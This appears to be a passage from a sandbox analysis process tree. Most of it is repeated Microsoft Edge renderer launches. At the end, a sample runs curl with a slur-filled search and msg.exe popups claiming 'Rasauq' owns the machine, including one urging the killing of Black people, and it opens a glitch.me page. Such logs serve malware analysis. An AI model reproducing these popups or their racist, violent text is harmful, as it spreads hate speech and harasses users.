    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7828,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=8296 /prefetch:1
        5⤵
        
        PID:5716
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=8592,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=8604 /prefetch:1
        5⤵
        
        PID:304
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=8628,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=8784 /prefetch:1
        5⤵
        
        PID:4268
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=9072,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=9076 /prefetch:1
        5⤵
        
        PID:5688
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=9304,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=9312 /prefetch:1
        5⤵
        
        PID:3868
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=9560,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=9568 /prefetch:1
        5⤵
        
        PID:5160
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=9828,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=9844 /prefetch:1
        5⤵
        
        PID:2796
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=10052,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=10060 /prefetch:1
        5⤵
        
        PID:568
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=9328,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=10220 /prefetch:1
        5⤵
        
        PID:1964
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=10392,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=10416 /prefetch:1
        5⤵
        
        PID:3356
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=10648,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=10672 /prefetch:1
        5⤵
        
        PID:4900
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=10864,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=10880 /prefetch:1
        5⤵
        
        PID:6380
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=10640,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11032 /prefetch:1
        5⤵
        
        PID:6596
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=11196,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11192 /prefetch:1
        5⤵
        
        PID:6884
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=11404,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11388 /prefetch:1
        5⤵
        
        PID:3612
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=11572,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11616 /prefetch:1
        5⤵
        
        PID:6544
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=11400,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11808 /prefetch:1
        5⤵
        
        PID:6904
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=11936,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11972 /prefetch:1
        5⤵
        
        PID:6164
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=12104,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11832 /prefetch:1
        5⤵
        
        PID:6824
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=11924,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=12188 /prefetch:1
        5⤵
        
        PID:6860
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=12560,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=12556 /prefetch:1
        5⤵
        
        PID:6820
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=12396,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=12728 /prefetch:1
        5⤵
        
        PID:6568
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=12912,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=12700 /prefetch:1
        5⤵
        
        PID:6872
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=13060,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=12856 /prefetch:1
        5⤵
        
        PID:6776
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=13264,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=13036 /prefetch:1
        5⤵
        
        PID:6756
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=13100,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=13308 /prefetch:1
        5⤵
        
        PID:5812
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=13612,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=13660 /prefetch:1
        5⤵
        
        PID:6540
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=13836,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=13824 /prefetch:1
        5⤵
        
        PID:7172
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=14008,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=14036 /prefetch:1
        5⤵
        
        PID:7464
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=14180,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=14188 /prefetch:1
        5⤵
        
        PID:7664
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=14376,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=14404 /prefetch:1
        5⤵
        
        PID:7956
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=14824,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=14832 /prefetch:1
        5⤵
        
        PID:8124
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=14996,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=15004 /prefetch:1
        5⤵
        
        PID:7324
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=15268,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=15276 /prefetch:1
        5⤵
        
        PID:7776
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=de --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=15624,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=15332 /prefetch:14
        5⤵
        
        PID:8084
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=15804,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=15812 /prefetch:1
        5⤵
        
        PID:6392
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=16036,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=16088 /prefetch:1
        5⤵
        
        PID:7576
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=16228,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=16280 /prefetch:1
        5⤵
        
        PID:7688
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=4796,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=4784 /prefetch:1
        5⤵
        
        PID:7472
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=17000,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=17004 /prefetch:1
        5⤵
        
        PID:5496
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=17604,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=17612 /prefetch:1
        5⤵
        
        PID:7692
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=17656,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=17792 /prefetch:1
        5⤵
        
        PID:8200
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=17944,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=17968 /prefetch:1
        5⤵
        
        PID:8556
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=18172,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=18180 /prefetch:1
        5⤵
        
        PID:8676
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=18112,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=18312 /prefetch:1
        5⤵
        
        PID:9024
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=18472,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=18488 /prefetch:1
        5⤵
        
        PID:9076
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=18676,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=18696 /prefetch:1
        5⤵
        
        PID:8392
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=18824,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=18872 /prefetch:1
        5⤵
        
        PID:8444
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --always-read-main-dll --field-trial-handle=19040,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=19032 /prefetch:1
        5⤵
        
        PID:9088
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --always-read-main-dll --field-trial-handle=19216,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=19240 /prefetch:1
        5⤵
        
        PID:1088
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --always-read-main-dll --field-trial-handle=19580,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=19624 /prefetch:1
        5⤵
        
        PID:8716
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=19768,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=19776 /prefetch:1
        5⤵
        
        PID:8796
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --always-read-main-dll --field-trial-handle=19940,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=19936 /prefetch:1
        5⤵
        
        PID:8056
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4252
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5848
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4176
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3888
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5400
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2528
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1288
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1308
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3648
